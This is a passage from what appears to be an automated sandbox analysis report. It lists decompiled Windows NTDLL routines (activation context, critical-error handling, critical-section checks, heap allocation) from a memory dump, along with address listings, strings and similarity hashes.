				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                        0x047ff71d
                                                        0x047ff722
                                                        0x047ff726
                                                        0x04844770
                                                        0x047ff765
                                                        0x047ff769
                                                        0x047ff769
                                                        0x047ff732
                                                        0x0484477a
                                                        0x00000000
                                                        0x0484477a
                                                        0x047ff738
                                                        0x047ff73a
                                                        0x047ff73c
                                                        0x047ff73f
                                                        0x047ff746
                                                        0x047ff778
                                                        0x047ff7a9
                                                        0x047ff7a9
                                                        0x047ff754
                                                        0x047ff75a
                                                        0x047ff75d
                                                        0x047ff75f
                                                        0x047ff761
                                                        0x047ff76f
                                                        0x047ff771
                                                        0x047ff771
                                                        0x047ff76f
                                                        0x047ff763
                                                        0x00000000
                                                        0x047ff763
                                                        0x047ff77d
                                                        0x047ff7a3
                                                        0x047ff7a5
                                                        0x00000000
                                                        0x047ff7a5
                                                        0x047ff77f
                                                        0x047ff782
                                                        0x047ff784
                                                        0x047ff786
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047ff788
                                                        0x047ff748
                                                        0x047ff74d
                                                        0x047ff78d
                                                        0x047ff793
                                                        0x047ff7b7
                                                        0x047ff7bc
                                                        0x00000000
                                                        0x047ff7bc
                                                        0x047ff798
                                                        0x00000000
                                                        0x00000000
                                                        0x047ff79d
                                                        0x047ff7b0
                                                        0x00000000
                                                        0x047ff7b0
                                                        0x047ff79f
                                                        0x00000000
                                                        0x047ff74f
                                                        0x047ff74f
                                                        0x00000000
                                                        0x047ff74f

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Actx
                                                        • API String ID: 0-89312691
                                                        • Opcode ID: 494e0c1ac6e06f9f1c880b806a1a2abe2e5d1093a9740bb98e045c4be8570095
                                                        • Instruction ID: 38e674132b5d18b97f3cf2f4f5aaaa1750d8c6c14b5931c825bff0b45325c230
                                                        • Opcode Fuzzy Hash: 494e0c1ac6e06f9f1c880b806a1a2abe2e5d1093a9740bb98e045c4be8570095
                                                        • Instruction Fuzzy Hash: FB11B235305E428BEB244E1E8C90736F29DAB95724FA8453BE661DB3A1EF70F8418360
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04888DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 71%
                                                        			E04888DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x48b0d50);
				E0482D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04865720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0482DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0482DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0482D130(_t34, _t39, _t40);
			}





                                                        0x04888df1
                                                        0x04888df1
                                                        0x04888df1
                                                        0x04888df1
                                                        0x04888df1
                                                        0x04888df1
                                                        0x04888df3
                                                        0x04888df8
                                                        0x04888dfd
                                                        0x04888e00
                                                        0x04888e0e
                                                        0x04888e2a
                                                        0x04888e36
                                                        0x04888e38
                                                        0x04888e3c
                                                        0x04888e46
                                                        0x04888e46
                                                        0x04888e36
                                                        0x04888e50
                                                        0x04888e56
                                                        0x04888e59
                                                        0x04888e5c
                                                        0x04888e60
                                                        0x04888e67
                                                        0x04888e6d
                                                        0x04888e73
                                                        0x04888e74
                                                        0x04888eb1
                                                        0x04888ebd

                                                        Strings
                                                        • Critical error detected %lx, xrefs: 04888E21
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Critical error detected %lx
                                                        • API String ID: 0-802127002
                                                        • Opcode ID: ea42afe883d56561ea25fd4c6c109a3a363baaf1af7a72e4635ef0a456c607a0
                                                        • Instruction ID: 1a1808c9f175813a367aa98c7fa992a0a6a5515ef9313e063190fc560caaa885
                                                        • Opcode Fuzzy Hash: ea42afe883d56561ea25fd4c6c109a3a363baaf1af7a72e4635ef0a456c607a0
                                                        • Instruction Fuzzy Hash: 95117975D40348DBEB24EFA885057DDBBB0AB04318F204B5DD069AB382C3746601CF15
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0486FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0486FF60
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                        • API String ID: 0-1911121157
                                                        • Opcode ID: fe51a5201a0d563c7724f880fd898b101e70a3c73e3d9c907e9f3247acf228e2
                                                        • Instruction ID: 2ad1de8c3892915996dab059e00442ad678e8acf3ad34ff17df30dca27879a21
                                                        • Opcode Fuzzy Hash: fe51a5201a0d563c7724f880fd898b101e70a3c73e3d9c907e9f3247acf228e2
                                                        • Instruction Fuzzy Hash: 9B114471910144EFEB52DF14D949F98BBB2FF04708F108A48E605E72A1CB78F980CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A5BA5, Relevance: .6, Instructions: 592COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 88%
                                                        			E048A5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x48b1178);
				E0482D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E048A4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0481D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E048A5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x48c60e8;
								if( *0x48c60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x48c60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04819710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04816DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0481F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0481F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0481F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0481FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0481FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0481F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0481F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E048A4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0482D130(_t427, _t494, _t511);
				}
			}










































































                                                        0x048a5ba5
                                                        0x048a5baa
                                                        0x048a5baf
                                                        0x048a5bb4
                                                        0x048a5bb6
                                                        0x048a5bbc
                                                        0x048a5bbe
                                                        0x048a5bc4
                                                        0x048a5bcd
                                                        0x048a5bd3
                                                        0x048a5bd6
                                                        0x048a5bdc
                                                        0x048a5be0
                                                        0x048a5be3
                                                        0x048a5beb
                                                        0x048a5bf2
                                                        0x048a5bf8
                                                        0x048a5bfe
                                                        0x048a5c04
                                                        0x048a5c0e
                                                        0x048a5c18
                                                        0x048a5c1f
                                                        0x048a5c25
                                                        0x048a5c2a
                                                        0x048a5c2c
                                                        0x048a5c32
                                                        0x048a5c3a
                                                        0x048a5c3f
                                                        0x048a5c42
                                                        0x048a5c48
                                                        0x048a5c5b
                                                        0x048a5c5b
                                                        0x048a5c2c
                                                        0x048a5cb7
                                                        0x048a5cb9
                                                        0x048a5cbf
                                                        0x048a5cc2
                                                        0x048a5cca
                                                        0x048a5ccb
                                                        0x048a5ccb
                                                        0x048a5cd1
                                                        0x048a5cd7
                                                        0x048a5cda
                                                        0x048a5ce1
                                                        0x048a5ce4
                                                        0x048a5ce7
                                                        0x048a5ced
                                                        0x048a5cf3
                                                        0x048a5cf9
                                                        0x048a5cff
                                                        0x048a5d08
                                                        0x048a5d0a
                                                        0x048a5d0e
                                                        0x048a5d10
                                                        0x00000000
                                                        0x00000000
                                                        0x048a5d16
                                                        0x048a5d1a
                                                        0x00000000
                                                        0x00000000
                                                        0x048a5d20
                                                        0x048a5d22
                                                        0x048a5d25
